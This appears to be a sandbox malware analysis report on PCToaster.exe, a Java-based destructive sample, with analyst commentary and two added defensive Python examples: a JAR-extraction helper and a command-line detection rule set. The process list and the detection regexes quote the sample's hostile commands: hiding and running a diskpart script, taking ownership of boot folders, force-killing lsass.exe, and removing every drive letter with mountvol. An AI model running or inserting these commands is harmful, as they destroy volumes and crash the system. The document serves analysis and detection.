Malware Analysis Report

2024-09-11 03:51

Sample ID 240620-r6de9axcpr
Target PCToaster.exe
SHA256 85a58aa96dccd94316a34608ba996656a22c8158d5156b6e454d9d69e6ff38c3
Tags
discovery exploit
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

85a58aa96dccd94316a34608ba996656a22c8158d5156b6e454d9d69e6ff38c3

Threat Level: Likely malicious

The file PCToaster.exe was found to be: Likely malicious.

Analyst summary (from the behavioral2 trace below): PCToaster.exe is a native launcher that re-executes itself through the Java runtime ("javaw.exe" -jar PCToaster.exe), so the real payload is a JAR carried inside the PE rather than the PE's own code. Under javaw.exe the sample drives built-in Windows tools against the host: it drops a diskpart script to %TEMP%\scr.txt, hides it with attrib +h and runs diskpart /s on it; it takes ownership of V:\Boot and V:\Recovery recursively with takeown (no V: volume exists on a default install, so the letter was most likely assigned by the diskpart script to the system or recovery partition; the script itself is not reproduced in this report, only its hashes); it force-kills lsass.exe with taskkill, which, if it succeeds, brings the system down because lsass is a critical process; and it removes every drive letter from A: to Z: with mountvol /d, leaving C: for last. The "exploit" and "privilege escalation" tags come from the sandbox's icacls/takeown heuristics; no exploit is visible in the trace and the sample already runs as Admin. The icacls call on C:\ProgramData\Oracle\Java\.oracle_jre_usage is made by the Oracle JRE's own usage tracker on every Java start, so only the takeown calls are the sample's. Nothing the sample did touched the network (see Network). The Windows 7 detonation (behavioral1, jre7) shows only the javaw launch and no child commands, so the payload either needs a newer Java than 7 or was otherwise inert there.

Malicious Activity Summary

discovery exploit

Possible privilege escalation attempt

Modifies file permissions

Enumerates connected drives

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

Views/modifies file attributes

Suspicious use of SetWindowsHookEx

Checks SCSI registry key(s)

Kills process with taskkill

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-20 14:47

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-20 14:47

Reported

2024-06-20 14:50

Platform

win7-20231129-en

Max time kernel

121s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PCToaster.exe"

Signatures

Processes

C:\Users\Admin\AppData\Local\Temp\PCToaster.exe

"C:\Users\Admin\AppData\Local\Temp\PCToaster.exe"

C:\Program Files\Java\jre7\bin\javaw.exe

"C:\Program Files\Java\jre7\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Local\Temp\PCToaster.exe"
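Both detonations show the launcher handing its own file to javaw.exe -jar. That works because java.util.zip locates an archive from its end-of-central-directory record, scanning back from the end of the file, so a JAR appended to a PE is still a valid JAR. The Python below is an added example, not code from the report, the sample or the sandbox: it reproduces that lookup to find where the embedded JAR starts and lists its entries without executing anything. It runs on a constructed stand-in (an MZ stub with a two-entry JAR built in memory), not on the real sample; the entry names in the stand-in are invented.

```python
"""List the JAR appended to a PE launcher without running it.

Added example for this report, not code from the sample or the sandbox. The
input is a constructed stand-in (an MZ stub with an in-memory JAR appended);
the real PCToaster.exe is not reproduced here.
"""
import io
import struct
import zipfile

EOCD_SIG = b"PK\x05\x06"   # end-of-central-directory signature
EOCD_MIN = 22              # fixed part of the EOCD record
MAX_COMMENT = 0xFFFF       # a ZIP comment of up to 64 KiB may follow the EOCD


def find_eocd(data: bytes) -> int:
    """Offset of the EOCD record, found by scanning backwards like java.util.zip; -1 if none."""
    start = max(0, len(data) - EOCD_MIN - MAX_COMMENT)
    return data.rfind(EOCD_SIG, start)


def zip_prefix_length(data: bytes) -> int:
    """Bytes preceding the embedded archive (the PE launcher), or -1 if no archive.

    In a plain JAR, central-directory offset + size lands exactly on the EOCD.
    When the JAR is appended to a PE, the stored offsets are still relative to
    the JAR, so the shortfall is the size of whatever was prepended.
    """
    eocd = find_eocd(data)
    if eocd < 0:
        return -1
    cd_size, cd_offset = struct.unpack_from("<II", data, eocd + 12)
    prefix = eocd - (cd_offset + cd_size)
    return prefix if prefix >= 0 else -1


def list_embedded_jar(data: bytes):
    """Return (payload_offset, entry names) for a PE with a JAR glued on the end."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE image (no MZ header)")
    prefix = zip_prefix_length(data)
    if prefix < 0:
        raise ValueError("no ZIP end-of-central-directory record found")
    # Slice from the prefix so ZipFile sees a self-consistent archive. If a
    # wrapper rewrote the offsets to be file-absolute, prefix is 0 and the same
    # code path still works: header_offset then already includes the PE bytes.
    with zipfile.ZipFile(io.BytesIO(data[prefix:])) as zf:
        infos = zf.infolist()
        if not infos:
            raise ValueError("embedded archive is empty")
        payload_offset = prefix + min(i.header_offset for i in infos)
        return payload_offset, [i.filename for i in infos]


def build_constructed_launcher() -> bytes:
    """Constructed stand-in: a fake MZ stub followed by a two-entry JAR built in memory."""
    stub = b"MZ" + b"\x00" * 62 + b"This program cannot be run in DOS mode.\r\n" + b"\x00" * 1000
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\r\nMain-Class: toaster.Main\r\n\r\n")
        # Placeholder bytes behind a class-file magic number, not a real class.
        zf.writestr("toaster/Main.class", b"\xca\xfe\xba\xbe" + b"\x00" * 16)
    return stub + buf.getvalue()


if __name__ == "__main__":
    sample = build_constructed_launcher()
    offset, names = list_embedded_jar(sample)
    print(f"JAR starts at offset {offset:#x}; entries: {names}")
```

Against the real file, call list_embedded_jar(open(path, "rb").read()) and extract the entries with zipfile from the returned offset. Decompiling the class files is the realistic way to learn what the sample writes into scr.txt, since the report carries only that file's hashes.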

Network

N/A

Files

memory/2180-0-0x0000000000400000-0x000000000046E000-memory.dmp

memory/2044-3-0x0000000002640000-0x00000000028B0000-memory.dmp

memory/2044-11-0x0000000000230000-0x0000000000231000-memory.dmp

memory/2044-14-0x0000000002640000-0x00000000028B0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-20 14:47

Reported

2024-06-20 14:50

Platform

win10v2004-20240508-en

Max time kernel

106s

Max time network

55s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PCToaster.exe"

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\SYSTEM32\takeown.exe N/A
N/A N/A C:\Windows\SYSTEM32\takeown.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\SYSTEM32\takeown.exe N/A
N/A N/A C:\Windows\SYSTEM32\takeown.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\K: C:\Windows\SYSTEM32\mountvol.exe N/A
File opened (read-only) \??\M: C:\Windows\SYSTEM32\mountvol.exe N/A
File opened (read-only) \??\N: C:\Windows\SYSTEM32\mountvol.exe N/A
File opened (read-only) \??\O: C:\Windows\SYSTEM32\mountvol.exe N/A
File opened (read-only) \??\Q: C:\Windows\SYSTEM32\mountvol.exe N/A
File opened (read-only) \??\V: C:\Windows\SYSTEM32\takeown.exe N/A
File opened (read-only) \??\H: C:\Windows\SYSTEM32\mountvol.exe N/A
File opened (read-only) \??\J: C:\Windows\SYSTEM32\mountvol.exe N/A
File opened (read-only) \??\S: C:\Windows\SYSTEM32\mountvol.exe N/A
File opened (read-only) \??\V: C:\Windows\SYSTEM32\takeown.exe N/A
File opened (read-only) \??\W: C:\Windows\SYSTEM32\mountvol.exe N/A
File opened (read-only) \??\X: C:\Windows\SYSTEM32\mountvol.exe N/A
File opened (read-only) \??\I: C:\Windows\SYSTEM32\mountvol.exe N/A
File opened (read-only) \??\L: C:\Windows\SYSTEM32\mountvol.exe N/A
File opened (read-only) \??\R: C:\Windows\SYSTEM32\mountvol.exe N/A
File opened (read-only) \??\Z: C:\Windows\SYSTEM32\mountvol.exe N/A
File opened (read-only) \??\A: C:\Windows\SYSTEM32\mountvol.exe N/A
File opened (read-only) \??\B: C:\Windows\SYSTEM32\mountvol.exe N/A
File opened (read-only) \??\E: C:\Windows\SYSTEM32\mountvol.exe N/A
File opened (read-only) \??\U: C:\Windows\SYSTEM32\mountvol.exe N/A
File opened (read-only) \??\Y: C:\Windows\SYSTEM32\mountvol.exe N/A
File opened (read-only) \??\G: C:\Windows\SYSTEM32\mountvol.exe N/A
File opened (read-only) \??\P: C:\Windows\SYSTEM32\mountvol.exe N/A
File opened (read-only) \??\T: C:\Windows\SYSTEM32\mountvol.exe N/A

Checks SCSI registry key(s)

These queries are made by vds.exe (the Virtual Disk Service that diskpart uses) and by taskmgr.exe, not by the sample or javaw.exe. The Ven_QEMU strings identify the analysis VM, but nothing in the trace shows the sample reading them for evasion.

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\System32\vds.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A

Suspicious use of AdjustPrivilegeToken

The two rows that belong to the sample's chain are takeown.exe enabling SeTakeOwnershipPrivilege (needed for takeown /f on V:\Boot and V:\Recovery) and taskkill.exe enabling SeDebugPrivilege (needed to open lsass.exe for termination). The taskmgr.exe rows are Task Manager's own start-up privilege adjustments.

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SYSTEM32\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: 33 (privilege LUID 33 = SeIncreaseWorkingSetPrivilege; the sandbox did not resolve the name) N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A (40 identical rows collapsed into one; all from Task Manager's own UI, and no write from the sample into taskmgr.exe is recorded)

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A (39 identical rows collapsed into one; all from Task Manager's own UI, and no write from the sample into taskmgr.exe is recorded)

Suspicious use of WriteProcessMemory

Every target appears twice in the raw report (two writes per child); the pairs are collapsed here. Each target is a direct child of the writing process (compare the process list), which is the pattern the sandbox records for ordinary process creation rather than injection into an unrelated process. 25 of the 26 mountvol.exe instances from the process list appear here.

Description Indicator Process Target
PID 4504 wrote to memory of 3976 (2 writes) N/A C:\Users\Admin\AppData\Local\Temp\PCToaster.exe C:\Program Files\Java\jre-1.8\bin\javaw.exe
PID 3976 wrote to memory of 2228 (2 writes) N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\system32\icacls.exe
PID 3976 wrote to memory of 440 (2 writes) N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\attrib.exe
PID 3976 wrote to memory of 688 (2 writes) N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\diskpart.exe
PID 3976 wrote to memory of 3780 (2 writes) N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\takeown.exe
PID 3976 wrote to memory of 4980 (2 writes) N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\takeown.exe
PID 3976 wrote to memory of 3708 (2 writes) N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\taskkill.exe
PID 3976 wrote to memory of 776, 3524, 4620, 5000, 4396, 3532, 1408, 2344, 3088, 2904, 3604, 2028, 5100, 5116, 5012, 3732, 4520, 4956, 728, 4472, 3220, 232, 2308, 3848, 860 (2 writes each) N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A

Processes

Only the chain PCToaster.exe -> javaw.exe -> icacls/attrib/diskpart/takeown/taskkill/mountvol is the sample's. vdsldr.exe and vds.exe are the Virtual Disk Service started on diskpart's behalf; taskmgr.exe, the rundll32.exe SHCreateLocalServerRunDll COM host and the fdPHost svchost.exe are ordinary Windows background processes that the sample did not spawn (no WriteProcessMemory entry points at them).

C:\Users\Admin\AppData\Local\Temp\PCToaster.exe

"C:\Users\Admin\AppData\Local\Temp\PCToaster.exe"

C:\Program Files\Java\jre-1.8\bin\javaw.exe

"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Local\Temp\PCToaster.exe"

C:\Windows\system32\icacls.exe

C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
(run by the Oracle JRE's usage tracker on every Java start; not sample behaviour, although it is what trips the "Modifies file permissions" and "Possible privilege escalation attempt" signatures together with takeown)

C:\Windows\SYSTEM32\attrib.exe

attrib +h C:\Users\Admin\AppData\Local\Temp\scr.txt

C:\Windows\SYSTEM32\diskpart.exe

diskpart /s C:\Users\Admin\AppData\Local\Temp\scr.txt

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Windows\SYSTEM32\takeown.exe

takeown /f V:\Boot /r

C:\Windows\SYSTEM32\takeown.exe

takeown /f V:\Recovery /r

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost

C:\Windows\SYSTEM32\taskkill.exe

taskkill /im lsass.exe /f

C:\Windows\SYSTEM32\mountvol.exe (26 separate instances, one per drive letter, in the order shown; C: is removed last)

mountvol A: /d
mountvol B: /d
mountvol D: /d
mountvol E: /d
mountvol F: /d
mountvol G: /d
mountvol H: /d
mountvol I: /d
mountvol J: /d
mountvol K: /d
mountvol L: /d
mountvol M: /d
mountvol N: /d
mountvol O: /d
mountvol P: /d
mountvol Q: /d
mountvol R: /d
mountvol S: /d
mountvol T: /d
mountvol U: /d
mountvol V: /d
mountvol W: /d
mountvol X: /d
mountvol Y: /d
mountvol Z: /d
mountvol C: /d
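The process list above is the whole attack in command lines, and it is a better detection source than the PE hash: the sample is a launcher for a JAR, so the hash changes with every rebuild while the chain of built-in tools does not. The Python below is an added example (not sandbox code) that runs a handful of command-line rules over process-creation events and reports any parent whose children trip several different rules. The events are constructed from the command lines in this report; the rule names, regexes and the threshold of three distinct rules are this example's own choices.

```python
"""Flag the LOLBin chain from the PCToaster detonation in process-creation logs.

Added example for this report, not sandbox code. Events below are constructed
from the command lines in the behavioral2 process list; rule names, regexes
and the chain threshold are this example's own choices.
"""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record: pid, parent pid, image path, command line."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed sample modelled on the behavioral2 process list (PIDs as in the report).
SAMPLE_EVENTS = [
    ProcEvent(4504, 1000, r"C:\Users\Admin\AppData\Local\Temp\PCToaster.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\PCToaster.exe"'),
    ProcEvent(3976, 4504, r"C:\Program Files\Java\jre-1.8\bin\javaw.exe",
              r'"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Local\Temp\PCToaster.exe"'),
    ProcEvent(440, 3976, r"C:\Windows\SYSTEM32\attrib.exe",
              r"attrib +h C:\Users\Admin\AppData\Local\Temp\scr.txt"),
    ProcEvent(688, 3976, r"C:\Windows\SYSTEM32\diskpart.exe",
              r"diskpart /s C:\Users\Admin\AppData\Local\Temp\scr.txt"),
    ProcEvent(3780, 3976, r"C:\Windows\SYSTEM32\takeown.exe", r"takeown /f V:\Boot /r"),
    ProcEvent(4980, 3976, r"C:\Windows\SYSTEM32\takeown.exe", r"takeown /f V:\Recovery /r"),
    ProcEvent(3708, 3976, r"C:\Windows\SYSTEM32\taskkill.exe", r"taskkill /im lsass.exe /f"),
    ProcEvent(776, 3976, r"C:\Windows\SYSTEM32\mountvol.exe", r"mountvol A: /d"),
    ProcEvent(860, 3976, r"C:\Windows\SYSTEM32\mountvol.exe", r"mountvol C: /d"),
    # Benign control: an administrator listing mount points from an interactive shell.
    ProcEvent(9001, 9000, r"C:\Windows\System32\mountvol.exe", r"mountvol"),
]

# One regex per behaviour in the chain. The JRE's own icacls call on
# .oracle_jre_usage is deliberately not a rule: it fires for any Java start.
RULES = {
    "javaw_jar_is_exe": re.compile(r'\bjavaw?(\.exe)?"?\s+-jar\s+"?[^"]+\.exe\b', re.I),
    "attrib_hide_in_temp": re.compile(r"\battrib(\.exe)?\b.*\s\+h\s+\S*\\temp\\", re.I),
    "diskpart_script_in_temp": re.compile(r"\bdiskpart(\.exe)?\s+/s\s+\S*\\temp\\", re.I),
    "takeown_boot_or_recovery": re.compile(r"\btakeown(\.exe)?\s+/f\s+[a-z]:\\(boot|recovery)\b", re.I),
    "taskkill_lsass": re.compile(r"\btaskkill(\.exe)?\b.*\s/im\s+lsass\.exe\b", re.I),
    "mountvol_delete_letter": re.compile(r"\bmountvol(\.exe)?\s+[a-z]:\s+/d\b", re.I),
}


def match_rules(event):
    """Names of every rule whose regex matches the event's command line, sorted."""
    return sorted(name for name, rx in RULES.items() if rx.search(event.cmdline))


def analyze(events, min_distinct_rules=3):
    """Score per process, then per parent.

    Each tool alone (takeown, mountvol, diskpart) is common in admin scripts, so a
    single hit is only recorded. A parent whose children trigger at least
    `min_distinct_rules` different rules is reported as a destructive chain,
    keyed by the parent PID with its image, so the driver (javaw.exe here, not
    the launcher PCToaster.exe) is what the analyst sees first.
    """
    by_pid = {e.pid: e for e in events}
    hits = {}                      # pid -> matched rule names
    per_parent = defaultdict(set)  # ppid -> distinct rule names across its children
    for e in events:
        names = match_rules(e)
        if names:
            hits[e.pid] = names
            per_parent[e.ppid].update(names)
    chains = {
        ppid: {"rules": sorted(rules),
               "driver": by_pid[ppid].image if ppid in by_pid else None}
        for ppid, rules in per_parent.items()
        if len(rules) >= min_distinct_rules
    }
    return {"hits": hits, "chains": chains}


if __name__ == "__main__":
    result = analyze(SAMPLE_EVENTS)
    for ppid, chain in result["chains"].items():
        print(f"destructive chain driven by pid {ppid} ({chain['driver']}): {', '.join(chain['rules'])}")
```

Feed it Sysmon event 1 or Windows 4688 records (pid, parent pid, image, command line) and the per-parent grouping is what separates this sample from a technician running mountvol or takeown by hand: the single-rule hits stay as context, and only a process that drives three or more of the behaviours is raised.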

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
N/A 239.255.255.250:3702 N/A udp
US 8.8.8.8:53 c.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.f.f.ip6.arpa udp
N/A 239.255.255.250:3702 N/A udp

None of this traffic is attributable to the sample: 239.255.255.250:3702/udp is WS-Discovery multicast from the Function Discovery host (the svchost.exe -s fdPHost instance in the process list), and the two DNS queries are reverse (PTR) lookups for 8.8.8.8 and for ff02::c, the IPv6 link-local multicast address WS-Discovery uses. No outbound connection, download or C2 contact was recorded in either detonation.

Files

memory/4504-0-0x0000000000400000-0x000000000046E000-memory.dmp

memory/3976-3-0x000002A093350000-0x000002A0935C0000-memory.dmp

C:\ProgramData\Oracle\Java\.oracle_jre_usage\3903daac9bc4a3b7.timestamp

MD5 ce0f4cdd8c73e8bfdd8f7c36fc51989c
SHA1 cbfee3a71a6a4a269105b87f90d7f38a45c3da0b
SHA256 a9aaac48e94fd8b5e296ccd99e2a4d73639f7c2b3b2c35bc02e8fc6cb5040856
SHA512 0a597b9a1a26193041e911f29b688db8015e28de713030832818d27e536d28f033a20aa44a4f994d31903ba8adfb2d8d6548018d4fac45dbd9eb2a49bda7be16

C:\Users\Admin\AppData\Local\Temp\scr.txt (the diskpart script passed to diskpart /s and hidden with attrib +h; the report records only its hashes, not its contents)

MD5 ad1869d6f0b2b809394605d3e73eeb74
SHA1 4bdedd14bfea9f891b98c4cc82c5f82a58df67f6
SHA256 7e9cde40095f2a877375cb30fecd4f64cf328e3ab11baed5242f73cbb94bd394
SHA512 8fe0f269daf94feaa246a644dbeeda52916855f1d2bfd2c6c876c7c9c80b0ceb7e42caf0b64a70bda9a64d4529b885aaa38998a515d6abbe88ad367e72324136

memory/3976-24-0x000002A091A80000-0x000002A091A81000-memory.dmp

memory/3976-27-0x000002A091A80000-0x000002A091A81000-memory.dmp

memory/3976-30-0x000002A091A80000-0x000002A091A81000-memory.dmp

memory/3976-33-0x000002A091A80000-0x000002A091A81000-memory.dmp

memory/3976-35-0x000002A091A80000-0x000002A091A81000-memory.dmp

memory/3212-42-0x0000017B3DB60000-0x0000017B3DB61000-memory.dmp

memory/3212-43-0x0000017B3DB60000-0x0000017B3DB61000-memory.dmp

memory/3212-44-0x0000017B3DB60000-0x0000017B3DB61000-memory.dmp

memory/3212-54-0x0000017B3DB60000-0x0000017B3DB61000-memory.dmp

memory/3212-53-0x0000017B3DB60000-0x0000017B3DB61000-memory.dmp

memory/3212-52-0x0000017B3DB60000-0x0000017B3DB61000-memory.dmp

memory/3212-51-0x0000017B3DB60000-0x0000017B3DB61000-memory.dmp

memory/3212-50-0x0000017B3DB60000-0x0000017B3DB61000-memory.dmp

memory/3212-49-0x0000017B3DB60000-0x0000017B3DB61000-memory.dmp

memory/3212-48-0x0000017B3DB60000-0x0000017B3DB61000-memory.dmp

memory/3976-55-0x000002A093350000-0x000002A0935C0000-memory.dmp

memory/3976-58-0x000002A091A80000-0x000002A091A81000-memory.dmp

memory/3976-79-0x000002A091A80000-0x000002A091A81000-memory.dmp

memory/3976-96-0x000002A091A80000-0x000002A091A81000-memory.dmp

memory/3976-99-0x000002A091A80000-0x000002A091A81000-memory.dmp

memory/3976-103-0x000002A091A80000-0x000002A091A81000-memory.dmp

memory/3976-104-0x000002A091A80000-0x000002A091A81000-memory.dmp

memory/3976-106-0x000002A091A80000-0x000002A091A81000-memory.dmp

memory/3976-109-0x000002A091A80000-0x000002A091A81000-memory.dmp

memory/3976-114-0x000002A091A80000-0x000002A091A81000-memory.dmp

memory/3976-115-0x000002A091A80000-0x000002A091A81000-memory.dmp